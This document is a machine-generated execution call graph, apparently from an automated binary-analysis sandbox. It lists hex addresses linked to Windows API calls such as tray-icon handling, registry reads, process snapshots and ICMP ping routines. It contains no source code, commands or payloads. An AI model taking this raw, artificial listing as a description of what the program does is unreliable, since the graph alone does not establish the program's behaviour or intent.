                                                                                                                                                                                                                                      execution_graph 102176 f536f5 102179 f5370f 102176->102179 102180 f53726 102179->102180 102181 f5372b 102180->102181 102182 f5378a 102180->102182 102219 f53788 102180->102219 102183 f53804 PostQuitMessage 102181->102183 102184 f53738 102181->102184 102186 f53790 102182->102186 102187 f93df4 102182->102187 102213 f53709 102183->102213 102190 f53743 102184->102190 102191 f93e61 102184->102191 102185 f5376f DefWindowProcW 102185->102213 102188 f53797 102186->102188 102189 f537bc SetTimer RegisterWindowMessageW 102186->102189 102238 f52f92 10 API calls 102187->102238 102193 f537a0 KillTimer 102188->102193 102194 f93d95 102188->102194 102195 f537e5 CreatePopupMenu 102189->102195 102189->102213 102196 f5374d 102190->102196 102197 f5380e 102190->102197 102251 fbc8f7 65 API calls ___scrt_fastfail 102191->102251 102231 f53907 102193->102231 102200 f93d9a 102194->102200 102201 f93dd0 MoveWindow 102194->102201 102195->102213 102203 f53758 102196->102203 102204 f93e46 102196->102204 102224 f6fcad 102197->102224 102199 f93e15 102239 f6f23c 40 API calls 102199->102239 102208 f93dbf SetFocus 102200->102208 102209 f93da0 102200->102209 102201->102213 102211 f53763 102203->102211 102212 f537f2 102203->102212 102204->102185 102250 fb1423 8 API calls 102204->102250 102205 f93e73 102205->102185 102205->102213 102208->102213 102209->102211 102214 f93da9 102209->102214 102211->102185 102221 f53907 Shell_NotifyIconW 102211->102221 102236 f5381f 75 API calls ___scrt_fastfail 102212->102236 102237 f52f92 10 API calls 102214->102237 102219->102185 102220 f53802 102220->102213 102222 f93e3a 102221->102222 102240 f5396b 102222->102240 102225 f6fcc5 ___scrt_fastfail 102224->102225 102226 f6fd4b 102224->102226 102252 f561a9 102225->102252 102226->102213 102228 f6fd34 KillTimer SetTimer 102228->102226 102229 f6fcec 102229->102228 102230 fafe2b Shell_NotifyIconW 102229->102230 102230->102228 102232 f537b3 102231->102232 102233 f53919 ___scrt_fastfail 102231->102233 102235 f559ff DeleteObject DestroyWindow 102232->102235 102234 f53938 Shell_NotifyIconW 102233->102234 102234->102232 102235->102213 102236->102220 102237->102213 102238->102199 102239->102211 102241 f53996 ___scrt_fastfail 102240->102241 102389 f55f32 102241->102389 102244 f53a1c 102246 f940cd Shell_NotifyIconW 102244->102246 102247 f53a3a Shell_NotifyIconW 102244->102247 102248 f561a9 55 API calls 102247->102248 102249 f53a50 102248->102249 102249->102219 102250->102219 102251->102205 102253 f561c6 102252->102253 102254 f562a8 102252->102254 102282 f57ad5 102253->102282 102254->102229 102257 f95278 LoadStringW 102261 f95292 102257->102261 102258 f561e1 102287 f58577 102258->102287 102260 f561f6 102262 f56203 102260->102262 102270 f952ae 102260->102270 102267 f56229 ___scrt_fastfail 102261->102267 102317 f5bed9 102261->102317 102262->102261 102263 f5620d 102262->102263 102299 f56b7c 102263->102299 102271 f5628e Shell_NotifyIconW 102267->102271 102269 f952f1 102327 f6fe6f 51 API calls 102269->102327 102270->102267 102270->102269 102321 f5bf73 102270->102321 102271->102254 102276 f95310 102278 f56b7c 8 API calls 102276->102278 102277 f952e3 102279 f57bb5 8 API calls 102277->102279 102280 f95321 102278->102280 102279->102269 102281 f56b7c 8 API calls 102280->102281 102281->102267 102328 f7017b 102282->102328 102284 f57afa 102337 f7014b 102284->102337 102286 f561d4 102286->102257 102286->102258 102288 f58587 _wcslen 102287->102288 102289 f96610 102287->102289 102292 f585c2 102288->102292 102293 f5859d 102288->102293 102353 f5adf4 102289->102353 102291 f96619 102291->102291 102294 f7014b 8 API calls 102292->102294 102352 f588e8 8 API calls 102293->102352 102296 f585ce 102294->102296 102297 f7017b 8 API calls 102296->102297 102298 f585a5 __fread_nolock 102297->102298 102298->102260 102300 f56b93 102299->102300 102301 f957fe 102299->102301 102363 f56ba4 102300->102363 102303 f7014b 8 API calls 102301->102303 102305 f95808 _wcslen 102303->102305 102304 f5621b 102308 f57bb5 102304->102308 102306 f7017b 8 API calls 102305->102306 102307 f95841 __fread_nolock 102306->102307 102309 f57bc7 102308->102309 102310 f9641d 102308->102310 102378 f57bd8 102309->102378 102388 fb13c8 8 API calls __fread_nolock 102310->102388 102313 f57bd3 102313->102267 102314 f96427 102315 f5bed9 8 API calls 102314->102315 102316 f96433 102314->102316 102315->102316 102318 f5befc __fread_nolock 102317->102318 102319 f5beed 102317->102319 102318->102267 102319->102318 102320 f7017b 8 API calls 102319->102320 102320->102318 102322 f7017b 8 API calls 102321->102322 102323 f5bf88 102322->102323 102324 f7014b 8 API calls 102323->102324 102325 f5bf96 102324->102325 102326 fba350 9 API calls 102325->102326 102326->102277 102327->102276 102329 f7014b ___std_exception_copy 102328->102329 102330 f7016a 102329->102330 102334 f7016c 102329->102334 102346 f7521d 7 API calls 2 library calls 102329->102346 102330->102284 102332 f709dd 102348 f73614 RaiseException 102332->102348 102334->102332 102347 f73614 RaiseException 102334->102347 102335 f709fa 102335->102284 102338 f70150 ___std_exception_copy 102337->102338 102339 f7016a 102338->102339 102342 f7016c 102338->102342 102349 f7521d 7 API calls 2 library calls 102338->102349 102339->102286 102341 f709dd 102351 f73614 RaiseException 102341->102351 102342->102341 102350 f73614 RaiseException 102342->102350 102344 f709fa 102344->102286 102346->102329 102347->102332 102348->102335 102349->102338 102350->102341 102351->102344 102352->102298 102354 f5ae02 102353->102354 102356 f5ae0b __fread_nolock 102353->102356 102354->102356 102357 f5c2c9 102354->102357 102356->102291 102358 f5c2dc 102357->102358 102362 f5c2d9 __fread_nolock 102357->102362 102359 f7014b 8 API calls 102358->102359 102360 f5c2e7 102359->102360 102361 f7017b 8 API calls 102360->102361 102361->102362 102362->102356 102364 f56bb4 _wcslen 102363->102364 102365 f56bc7 102364->102365 102366 f95860 102364->102366 102373 f57d74 102365->102373 102368 f7014b 8 API calls 102366->102368 102370 f9586a 102368->102370 102369 f56bd4 __fread_nolock 102369->102304 102371 f7017b 8 API calls 102370->102371 102372 f9589a __fread_nolock 102371->102372 102374 f57d8a 102373->102374 102377 f57d85 __fread_nolock 102373->102377 102375 f7017b 8 API calls 102374->102375 102376 f96528 102374->102376 102375->102377 102376->102376 102377->102369 102379 f57be7 102378->102379 102384 f57c1b __fread_nolock 102378->102384 102380 f9644e 102379->102380 102381 f57c0e 102379->102381 102379->102384 102382 f7014b 8 API calls 102380->102382 102383 f57d74 8 API calls 102381->102383 102385 f9645d 102382->102385 102383->102384 102384->102313 102386 f7017b 8 API calls 102385->102386 102387 f96491 __fread_nolock 102386->102387 102388->102314 102390 f539eb 102389->102390 102391 f55f4e 102389->102391 102390->102244 102393 fbd11f 42 API calls _strftime 102390->102393 102391->102390 102392 f95070 DestroyIcon 102391->102392 102392->102390 102393->102244 102394 f8947a 102395 f89487 102394->102395 102399 f8949f 102394->102399 102451 f7f649 20 API calls __dosmaperr 102395->102451 102397 f8948c 102452 f82b5c 26 API calls _strftime 102397->102452 102400 f894fa 102399->102400 102408 f89497 102399->102408 102453 f90144 21 API calls 2 library calls 102399->102453 102414 f7dcc5 102400->102414 102403 f89512 102421 f88fb2 102403->102421 102405 f89519 102406 f7dcc5 __fread_nolock 26 API calls 102405->102406 102405->102408 102407 f89545 102406->102407 102407->102408 102409 f7dcc5 __fread_nolock 26 API calls 102407->102409 102410 f89553 102409->102410 102410->102408 102411 f7dcc5 __fread_nolock 26 API calls 102410->102411 102412 f89563 102411->102412 102413 f7dcc5 __fread_nolock 26 API calls 102412->102413 102413->102408 102415 f7dce6 102414->102415 102416 f7dcd1 102414->102416 102415->102403 102454 f7f649 20 API calls __dosmaperr 102416->102454 102418 f7dcd6 102455 f82b5c 26 API calls _strftime 102418->102455 102420 f7dce1 102420->102403 102422 f88fbe BuildCatchObjectHelperInternal 102421->102422 102423 f88fde 102422->102423 102424 f88fc6 102422->102424 102426 f890a4 102423->102426 102431 f89017 102423->102431 102522 f7f636 20 API calls __dosmaperr 102424->102522 102529 f7f636 20 API calls __dosmaperr 102426->102529 102428 f88fcb 102523 f7f649 20 API calls __dosmaperr 102428->102523 102429 f890a9 102530 f7f649 20 API calls __dosmaperr 102429->102530 102433 f8903b 102431->102433 102434 f89026 102431->102434 102456 f854ba EnterCriticalSection 102433->102456 102524 f7f636 20 API calls __dosmaperr 102434->102524 102436 f89033 102531 f82b5c 26 API calls _strftime 102436->102531 102438 f89041 102440 f8905d 102438->102440 102441 f89072 102438->102441 102439 f8902b 102525 f7f649 20 API calls __dosmaperr 102439->102525 102526 f7f649 20 API calls __dosmaperr 102440->102526 102457 f890c5 102441->102457 102443 f88fd3 __wsopen_s 102443->102405 102447 f89062 102527 f7f636 20 API calls __dosmaperr 102447->102527 102448 f8906d 102528 f8909c LeaveCriticalSection __wsopen_s 102448->102528 102451->102397 102452->102408 102453->102400 102454->102418 102455->102420 102456->102438 102458 f890ef 102457->102458 102459 f890d7 102457->102459 102461 f89459 102458->102461 102464 f89134 102458->102464 102548 f7f636 20 API calls __dosmaperr 102459->102548 102571 f7f636 20 API calls __dosmaperr 102461->102571 102462 f890dc 102549 f7f649 20 API calls __dosmaperr 102462->102549 102467 f8913f 102464->102467 102470 f890e4 102464->102470 102475 f8916f 102464->102475 102466 f8945e 102572 f7f649 20 API calls __dosmaperr 102466->102572 102550 f7f636 20 API calls __dosmaperr 102467->102550 102470->102448 102471 f8914c 102573 f82b5c 26 API calls _strftime 102471->102573 102472 f89144 102551 f7f649 20 API calls __dosmaperr 102472->102551 102476 f89188 102475->102476 102477 f891ca 102475->102477 102478 f891ae 102475->102478 102476->102478 102484 f89195 102476->102484 102532 f83b93 102477->102532 102552 f7f636 20 API calls __dosmaperr 102478->102552 102480 f891b3 102553 f7f649 20 API calls __dosmaperr 102480->102553 102539 f8fc1b 102484->102539 102486 f891ba 102554 f82b5c 26 API calls _strftime 102486->102554 102487 f89333 102490 f893a9 102487->102490 102493 f8934c GetConsoleMode 102487->102493 102492 f893ad ReadFile 102490->102492 102491 f891ea 102494 f82d38 _free 20 API calls 102491->102494 102495 f89421 GetLastError 102492->102495 102496 f893c7 102492->102496 102493->102490 102497 f8935d 102493->102497 102498 f891f1 102494->102498 102499 f8942e 102495->102499 102500 f89385 102495->102500 102496->102495 102501 f8939e 102496->102501 102497->102492 102502 f89363 ReadConsoleW 102497->102502 102503 f891fb 102498->102503 102504 f89216 102498->102504 102569 f7f649 20 API calls __dosmaperr 102499->102569 102520 f891c5 __fread_nolock 102500->102520 102566 f7f613 20 API calls 2 library calls 102500->102566 102515 f893ec 102501->102515 102516 f89403 102501->102516 102501->102520 102502->102501 102508 f8937f GetLastError 102502->102508 102561 f7f649 20 API calls __dosmaperr 102503->102561 102563 f897a4 102504->102563 102508->102500 102509 f82d38 _free 20 API calls 102509->102470 102510 f89200 102562 f7f636 20 API calls __dosmaperr 102510->102562 102511 f89433 102570 f7f636 20 API calls __dosmaperr 102511->102570 102567 f88de1 31 API calls 4 library calls 102515->102567 102518 f8941a 102516->102518 102516->102520 102568 f88c21 29 API calls __wsopen_s 102518->102568 102520->102509 102521 f8941f 102521->102520 102522->102428 102523->102443 102524->102439 102525->102436 102526->102447 102527->102448 102528->102443 102529->102429 102530->102436 102531->102443 102533 f83bd1 102532->102533 102537 f83ba1 pre_c_initialization 102532->102537 102575 f7f649 20 API calls __dosmaperr 102533->102575 102534 f83bbc RtlAllocateHeap 102536 f83bcf 102534->102536 102534->102537 102555 f82d38 102536->102555 102537->102533 102537->102534 102574 f7521d 7 API calls 2 library calls 102537->102574 102540 f8fc28 102539->102540 102541 f8fc35 102539->102541 102576 f7f649 20 API calls __dosmaperr 102540->102576 102544 f8fc41 102541->102544 102577 f7f649 20 API calls __dosmaperr 102541->102577 102543 f8fc2d 102543->102487 102544->102487 102546 f8fc62 102578 f82b5c 26 API calls _strftime 102546->102578 102548->102462 102549->102470 102550->102472 102551->102471 102552->102480 102553->102486 102554->102520 102556 f82d6c _free 102555->102556 102557 f82d43 RtlFreeHeap 102555->102557 102556->102491 102557->102556 102558 f82d58 102557->102558 102579 f7f649 20 API calls __dosmaperr 102558->102579 102560 f82d5e GetLastError 102560->102556 102561->102510 102562->102520 102580 f8970b 102563->102580 102566->102520 102567->102520 102568->102521 102569->102511 102570->102520 102571->102466 102572->102471 102573->102470 102574->102537 102575->102536 102576->102543 102577->102546 102578->102543 102579->102560 102589 f85737 102580->102589 102582 f8971d 102583 f89725 102582->102583 102584 f89736 SetFilePointerEx 102582->102584 102602 f7f649 20 API calls __dosmaperr 102583->102602 102586 f8974e GetLastError 102584->102586 102588 f8972a 102584->102588 102603 f7f613 20 API calls 2 library calls 102586->102603 102588->102484 102590 f85744 102589->102590 102592 f85759 102589->102592 102604 f7f636 20 API calls __dosmaperr 102590->102604 102595 f8577e 102592->102595 102606 f7f636 20 API calls __dosmaperr 102592->102606 102594 f85749 102605 f7f649 20 API calls __dosmaperr 102594->102605 102595->102582 102596 f85789 102607 f7f649 20 API calls __dosmaperr 102596->102607 102599 f85751 102599->102582 102600 f85791 102608 f82b5c 26 API calls _strftime 102600->102608 102602->102588 102603->102588 102604->102594 102605->102599 102606->102596 102607->102600 102608->102599 102609 f51033 102614 f568b4 102609->102614 102613 f51042 102615 f5bf73 8 API calls 102614->102615 102616 f56922 102615->102616 102622 f5589f 102616->102622 102619 f569bf 102620 f51038 102619->102620 102625 f56b14 8 API calls __fread_nolock 102619->102625 102621 f70413 29 API calls __onexit 102620->102621 102621->102613 102626 f558cb 102622->102626 102625->102619 102627 f558be 102626->102627 102628 f558d8 102626->102628 102627->102619 102628->102627 102629 f558df RegOpenKeyExW 102628->102629 102629->102627 102630 f558f9 RegQueryValueExW 102629->102630 102631 f5592f RegCloseKey 102630->102631 102632 f5591a 102630->102632 102631->102627 102632->102631 102633 f5dd3d 102634 f5dd63 102633->102634 102635 fa19c2 102633->102635 102636 f5dead 102634->102636 102639 f7014b 8 API calls 102634->102639 102638 fa1a82 102635->102638 102640 fa1a26 102635->102640 102646 fa1a46 102635->102646 102641 f7017b 8 API calls 102636->102641 102716 fc3fe1 81 API calls __wsopen_s 102638->102716 102645 f5dd8d 102639->102645 102714 f6e6e8 207 API calls 102640->102714 102652 f5dee4 __fread_nolock 102641->102652 102642 fa1a7d 102647 f7014b 8 API calls 102645->102647 102645->102652 102646->102642 102715 fc3fe1 81 API calls __wsopen_s 102646->102715 102648 f5dddb 102647->102648 102648->102640 102650 f5de16 102648->102650 102649 f7017b 8 API calls 102649->102652 102682 f60340 102650->102682 102652->102646 102652->102649 102653 f5de29 102653->102642 102653->102652 102654 fa1aa5 102653->102654 102656 f5de77 102653->102656 102657 f5d526 102653->102657 102717 fc3fe1 81 API calls __wsopen_s 102654->102717 102656->102636 102656->102657 102658 f7014b 8 API calls 102657->102658 102659 f5d589 102658->102659 102675 f5c32d 102659->102675 102662 f7014b 8 API calls 102668 f5d66e messages 102662->102668 102664 f5bed9 8 API calls 102664->102668 102667 fa1f79 102719 fb56ae 8 API calls messages 102667->102719 102668->102664 102668->102667 102669 fa1f94 102668->102669 102671 f5c3ab 8 API calls 102668->102671 102672 f5d911 messages 102668->102672 102718 f5b4c8 8 API calls 102668->102718 102671->102668 102673 f5d9ac messages 102672->102673 102705 f5c3ab 102672->102705 102674 f5d9c3 102673->102674 102713 f6e30a 8 API calls messages 102673->102713 102678 f5c33d 102675->102678 102676 f5c345 102676->102662 102677 f7014b 8 API calls 102677->102678 102678->102676 102678->102677 102679 f5bf73 8 API calls 102678->102679 102680 f5bed9 8 API calls 102678->102680 102681 f5c32d 8 API calls 102678->102681 102679->102678 102680->102678 102681->102678 102701 f60376 messages 102682->102701 102683 f70413 29 API calls pre_c_initialization 102683->102701 102684 f70568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 102684->102701 102685 fa632b 102795 fc3fe1 81 API calls __wsopen_s 102685->102795 102687 f61695 102694 f5bed9 8 API calls 102687->102694 102700 f6049d messages 102687->102700 102688 f7014b 8 API calls 102688->102701 102690 fa625a 102794 fc3fe1 81 API calls __wsopen_s 102690->102794 102691 fa5cdb 102697 f5bed9 8 API calls 102691->102697 102691->102700 102694->102700 102695 f5bed9 8 API calls 102695->102701 102697->102700 102698 f705b2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 102698->102701 102699 f5bf73 8 API calls 102699->102701 102700->102653 102701->102683 102701->102684 102701->102685 102701->102687 102701->102688 102701->102690 102701->102691 102701->102695 102701->102698 102701->102699 102701->102700 102702 fa6115 102701->102702 102704 f60aae messages 102701->102704 102720 f61990 102701->102720 102782 f61e50 102701->102782 102792 fc3fe1 81 API calls __wsopen_s 102702->102792 102793 fc3fe1 81 API calls __wsopen_s 102704->102793 102706 f5c3b9 102705->102706 102712 f5c3e1 messages 102705->102712 102707 f5c3c7 102706->102707 102708 f5c3ab 8 API calls 102706->102708 102709 f5c3cd 102707->102709 102710 f5c3ab 8 API calls 102707->102710 102708->102707 102711 f5c7e0 8 API calls 102709->102711 102709->102712 102710->102709 102711->102712 102712->102673 102713->102673 102714->102646 102715->102642 102716->102642 102717->102642 102718->102668 102719->102669 102721 f619b6 102720->102721 102722 f61a2e 102720->102722 102724 fa6b60 102721->102724 102725 f619c3 102721->102725 102723 fa6a4d 102722->102723 102740 f61a3d 102722->102740 102727 fa6a58 102723->102727 102728 fa6b54 102723->102728 102802 fd85db 207 API calls 2 library calls 102724->102802 102733 fa6b84 102725->102733 102734 f619cd 102725->102734 102800 f6b35c 207 API calls 102727->102800 102801 fc3fe1 81 API calls __wsopen_s 102728->102801 102729 fa6bb5 102735 fa6be2 102729->102735 102736 fa6bc0 102729->102736 102730 f60340 207 API calls 102730->102740 102733->102729 102739 fa6b9c 102733->102739 102738 f5bed9 8 API calls 102734->102738 102781 f619e0 messages 102734->102781 102805 fd60e6 102735->102805 102804 fd85db 207 API calls 2 library calls 102736->102804 102737 f61bb5 102737->102701 102738->102781 102803 fc3fe1 81 API calls __wsopen_s 102739->102803 102740->102730 102740->102737 102741 fa6979 102740->102741 102744 fa6908 102740->102744 102759 f61ba9 102740->102759 102766 f61af4 102740->102766 102740->102781 102799 fc3fe1 81 API calls __wsopen_s 102741->102799 102798 fc3fe1 81 API calls __wsopen_s 102744->102798 102747 fa6dd9 102751 fa6e0f 102747->102751 102902 fd81ce 65 API calls 102747->102902 102749 fa6c81 102875 fc1ad8 8 API calls 102749->102875 102904 f5b4c8 8 API calls 102751->102904 102753 fa6db7 102878 f58ec0 102753->102878 102756 f5bed9 8 API calls 102756->102781 102758 fa6ded 102761 f58ec0 52 API calls 102758->102761 102759->102737 102797 fc3fe1 81 API calls __wsopen_s 102759->102797 102760 fa6c08 102812 fc148b 102760->102812 102776 fa6df5 _wcslen 102761->102776 102764 fa6c93 102876 f5bd07 8 API calls 102764->102876 102765 fa691d messages 102765->102741 102778 f61b62 messages 102765->102778 102779 f61a23 messages 102765->102779 102766->102759 102796 f61ca0 8 API calls 102766->102796 102770 f61b55 102770->102759 102770->102778 102771 fa6dbf _wcslen 102771->102747 102901 f5b4c8 8 API calls 102771->102901 102773 fa6c9c 102780 fc148b 8 API calls 102773->102780 102776->102751 102903 f5b4c8 8 API calls 102776->102903 102778->102756 102778->102779 102778->102781 102779->102701 102780->102781 102781->102747 102781->102779 102877 fd808f 53 API calls __wsopen_s 102781->102877 102783 f61e6d messages 102782->102783 102784 f62512 102783->102784 102786 f61ff7 messages 102783->102786 102787 fa7837 102783->102787 102791 fa766b 102783->102791 103551 f6e322 8 API calls messages 102783->103551 102784->102786 103553 f6be08 39 API calls 102784->103553 102786->102701 102787->102786 103552 f7d2d5 39 API calls 102787->103552 103550 f7d2d5 39 API calls 102791->103550 102792->102704 102793->102700 102794->102700 102795->102700 102796->102770 102797->102779 102798->102765 102799->102781 102800->102778 102801->102724 102802->102781 102803->102779 102804->102781 102806 fd6101 102805->102806 102807 fa6bed 102805->102807 102808 f7017b 8 API calls 102806->102808 102807->102749 102807->102760 102810 fd6123 102808->102810 102809 f7014b 8 API calls 102809->102810 102810->102807 102810->102809 102905 fc1400 8 API calls 102810->102905 102813 fa6c32 102812->102813 102814 fc1499 102812->102814 102816 f62b20 102813->102816 102814->102813 102815 f7014b 8 API calls 102814->102815 102815->102813 102817 f62b86 102816->102817 102818 f62fc0 102816->102818 102820 fa7bd8 102817->102820 102821 f62ba0 102817->102821 103113 f705b2 5 API calls __Init_thread_wait 102818->103113 103076 fd7af9 102820->103076 102906 f63160 102821->102906 102823 f62fca 102833 f6300b 102823->102833 103114 f5b329 102823->103114 102825 fa7be4 102825->102781 102828 f63160 9 API calls 102829 f62bc6 102828->102829 102831 f62bfc 102829->102831 102829->102833 102830 fa7bed 102830->102781 102832 fa7bfd 102831->102832 102856 f62c18 __fread_nolock 102831->102856 103124 fc3fe1 81 API calls __wsopen_s 102832->103124 102833->102830 103121 f5b4c8 8 API calls 102833->103121 102836 f62fe4 103120 f70568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 102836->103120 102837 f63049 103122 f6e6e8 207 API calls 102837->103122 102839 fa7c15 103125 fc3fe1 81 API calls __wsopen_s 102839->103125 102842 f62d3f 102843 fa7c78 102842->102843 102844 f62d4c 102842->102844 103127 fd61a2 53 API calls _wcslen 102843->103127 102846 f63160 9 API calls 102844->102846 102848 f62d59 102846->102848 102847 f7014b 8 API calls 102847->102856 102853 f63160 9 API calls 102848->102853 102862 f62dd7 messages 102848->102862 102849 f63082 103123 f6fe39 8 API calls 102849->103123 102850 f7017b 8 API calls 102850->102856 102852 f62f2d 102852->102781 102860 f62d73 102853->102860 102855 f60340 207 API calls 102855->102856 102856->102837 102856->102839 102856->102842 102856->102847 102856->102850 102856->102855 102857 fa7c59 102856->102857 102856->102862 103126 fc3fe1 81 API calls __wsopen_s 102857->103126 102858 f63160 9 API calls 102858->102862 102860->102862 102864 f5bed9 8 API calls 102860->102864 102862->102849 102862->102858 102863 f62e8b messages 102862->102863 102916 fda6aa 102862->102916 102924 f58bda 102862->102924 102999 fdad47 102862->102999 103004 fda5b2 102862->103004 103010 fc664c 102862->103010 103017 fd0fb8 102862->103017 103042 fd9ffc 102862->103042 103045 fcf94a 102862->103045 103054 fd9fe8 102862->103054 103057 f6ac3e 102862->103057 103128 fc3fe1 81 API calls __wsopen_s 102862->103128 102863->102852 103112 f6e322 8 API calls messages 102863->103112 102864->102862 102875->102764 102876->102773 102877->102753 102879 f58ed5 102878->102879 102894 f58ed2 102878->102894 102880 f58edd 102879->102880 102881 f58f0b 102879->102881 103546 f75536 26 API calls 102880->103546 102883 f58f1d 102881->102883 102888 f96a38 102881->102888 102891 f96b1f 102881->102891 103547 f6fe6f 51 API calls 102883->103547 102886 f96b37 102886->102886 102887 f58eed 102890 f7014b 8 API calls 102887->102890 102895 f96ab1 102888->102895 102896 f7017b 8 API calls 102888->102896 102892 f58ef7 102890->102892 103549 f754f3 26 API calls 102891->103549 102893 f5b329 8 API calls 102892->102893 102893->102894 102894->102771 103548 f6fe6f 51 API calls 102895->103548 102897 f96a81 102896->102897 102898 f7014b 8 API calls 102897->102898 102899 f96aa8 102898->102899 102900 f5b329 8 API calls 102899->102900 102900->102895 102901->102747 102902->102758 102903->102751 102904->102779 102905->102810 102907 f631a1 102906->102907 102908 f6317d 102906->102908 103129 f705b2 5 API calls __Init_thread_wait 102907->103129 102915 f62bb0 102908->102915 103131 f705b2 5 API calls __Init_thread_wait 102908->103131 102911 f631ab 102911->102908 103130 f70568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 102911->103130 102912 f69f47 102912->102915 103132 f70568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 102912->103132 102915->102828 102918 fda705 102916->102918 102923 fda6c5 102916->102923 102917 fda723 102919 f5c98d 39 API calls 102917->102919 102921 fda780 102917->102921 102917->102923 102918->102917 103165 f5c98d 102918->103165 102919->102921 103133 fc0372 102921->103133 102923->102862 102925 f58ec0 52 API calls 102924->102925 102926 f58bf9 102925->102926 102927 f58ec0 52 API calls 102926->102927 102928 f58c0e 102927->102928 102929 f58ec0 52 API calls 102928->102929 102930 f58c21 102929->102930 102931 f58ec0 52 API calls 102930->102931 102932 f58c37 102931->102932 102933 f57ad5 8 API calls 102932->102933 102934 f58c4b 102933->102934 102935 f96767 102934->102935 102936 f5c98d 39 API calls 102934->102936 102938 f57e12 8 API calls 102935->102938 102937 f58c72 102936->102937 102937->102935 102968 f58c98 try_get_first_available_module 102937->102968 102939 f96786 102938->102939 102940 f58470 8 API calls 102939->102940 102941 f96798 102940->102941 102943 f58a60 8 API calls 102941->102943 102973 f967bd 102941->102973 102943->102973 102945 f58d3c 103224 f57e12 102945->103224 102946 f58ec0 52 API calls 102950 f58d27 102946->102950 102947 f58d5c 102952 f58d71 102947->102952 102953 f9696e 102947->102953 102948 f96873 102954 f9687d 102948->102954 102955 f968bc 102948->102955 102951 f58ec0 52 API calls 102950->102951 102951->102945 103230 f58470 102952->103230 102959 f58470 8 API calls 102953->102959 102960 f58470 8 API calls 102954->102960 102956 f58470 8 API calls 102955->102956 102961 f968c5 102956->102961 102958 f5893c 8 API calls 102958->102973 102963 f9697b 102959->102963 102964 f96885 102960->102964 102965 f58a60 8 API calls 102961->102965 102969 f58a60 8 API calls 102963->102969 102970 f58ec0 52 API calls 102964->102970 102972 f968e1 102965->102972 102967 f58a60 8 API calls 102967->102973 102968->102945 102968->102946 102993 f58d91 try_get_first_available_module 102968->102993 102969->102993 102971 f96897 102970->102971 103243 f58844 8 API calls __fread_nolock 102971->103243 102978 f58ec0 52 API calls 102972->102978 102973->102958 102973->102967 102997 f58e71 102973->102997 103242 f58844 8 API calls __fread_nolock 102973->103242 102975 f968ab 102977 f5893c 8 API calls 102975->102977 102979 f968b9 102977->102979 102981 f968fc 102978->102981 102985 f58a60 8 API calls 102979->102985 102980 f5893c 8 API calls 102980->102993 103244 f58844 8 API calls __fread_nolock 102981->103244 102982 f969c1 102983 f969f1 102982->102983 102986 f969e5 102982->102986 103210 f5893c 102983->103210 102985->102997 103245 f5ad40 8 API calls __fread_nolock 102986->103245 102987 f58a60 8 API calls 102987->102993 102989 f96910 102990 f5893c 8 API calls 102989->102990 102990->102979 102993->102980 102993->102982 102993->102987 102993->102997 103241 f58844 8 API calls __fread_nolock 102993->103241 102994 f969ef 102996 f96a12 102998 f5bd57 8 API calls 102996->102998 102997->102862 102998->102994 103000 f58ec0 52 API calls 102999->103000 103001 fdad63 103000->103001 103264 fbdd87 CreateToolhelp32Snapshot Process32FirstW 103001->103264 103003 fdad72 103003->102862 103008 fda5c5 103004->103008 103005 f58ec0 52 API calls 103006 fda632 103005->103006 103342 fc18a9 103006->103342 103008->103005 103009 fda5d4 103008->103009 103009->102862 103011 f58ec0 52 API calls 103010->103011 103012 fc6662 103011->103012 103383 fbdc54 103012->103383 103014 fc666a 103015 fc666e GetLastError 103014->103015 103016 fc6683 103014->103016 103015->103016 103016->102862 103018 fd0fe1 103017->103018 103019 fd100f WSAStartup 103018->103019 103021 f5c98d 39 API calls 103018->103021 103020 fd1054 103019->103020 103041 fd1023 messages 103019->103041 103425 f6c1f6 103020->103425 103023 fd0ffc 103021->103023 103023->103019 103025 f5c98d 39 API calls 103023->103025 103027 fd100b 103025->103027 103026 f58ec0 52 API calls 103028 fd1069 103026->103028 103027->103019 103430 f6f9d4 WideCharToMultiByte 103028->103430 103030 fd1075 inet_addr gethostbyname 103031 fd1093 IcmpCreateFile 103030->103031 103030->103041 103032 fd10d3 103031->103032 103031->103041 103033 f7017b 8 API calls 103032->103033 103034 fd10ec 103033->103034 103438 f5423c 103034->103438 103037 fd112b IcmpSendEcho 103040 fd114c 103037->103040 103038 fd1102 IcmpSendEcho 103038->103040 103039 fd1212 IcmpCloseHandle WSACleanup 103039->103041 103040->103039 103041->102862 103443 fd89b6 103042->103443 103044 fda00c 103044->102862 103046 f7017b 8 API calls 103045->103046 103047 fcf95b 103046->103047 103048 f5423c 8 API calls 103047->103048 103049 fcf965 103048->103049 103050 f58ec0 52 API calls 103049->103050 103051 fcf97c GetEnvironmentVariableW 103050->103051 103533 fc160f 8 API calls 103051->103533 103053 fcf999 messages 103053->102862 103055 fd89b6 119 API calls 103054->103055 103056 fd9ff8 103055->103056 103056->102862 103058 f58ec0 52 API calls 103057->103058 103059 f6ac68 103058->103059 103534 f6bc58 103059->103534 103061 f6ac7f 103062 f5c98d 39 API calls 103061->103062 103064 f6b09b _wcslen 103061->103064 103062->103064 103063 f6bbbe 43 API calls 103063->103064 103064->103063 103065 f74d98 _strftime 40 API calls 103064->103065 103066 f57ad5 8 API calls 103064->103066 103069 f56c03 8 API calls 103064->103069 103070 f6b1fb 103064->103070 103071 f58ec0 52 API calls 103064->103071 103072 f5c98d 39 API calls 103064->103072 103073 f58577 8 API calls 103064->103073 103074 f5396b 60 API calls 103064->103074 103075 f53907 Shell_NotifyIconW 103064->103075 103539 f5ad40 8 API calls __fread_nolock 103064->103539 103540 f57b1a 8 API calls 103064->103540 103065->103064 103066->103064 103069->103064 103070->102862 103071->103064 103072->103064 103073->103064 103074->103064 103075->103064 103077 fd7b38 103076->103077 103078 fd7b52 103076->103078 103541 fc3fe1 81 API calls __wsopen_s 103077->103541 103079 fd60e6 8 API calls 103078->103079 103082 fd7b5d 103079->103082 103081 fd7b4a 103081->102825 103083 f60340 206 API calls 103082->103083 103084 fd7bc1 103083->103084 103084->103081 103085 fd7c5c 103084->103085 103089 fd7c03 103084->103089 103086 fd7cb0 103085->103086 103087 fd7c62 103085->103087 103086->103081 103088 f58ec0 52 API calls 103086->103088 103542 fc1ad8 8 API calls 103087->103542 103090 fd7cc2 103088->103090 103094 fc148b 8 API calls 103089->103094 103092 f5c2c9 8 API calls 103090->103092 103095 fd7ce6 CharUpperBuffW 103092->103095 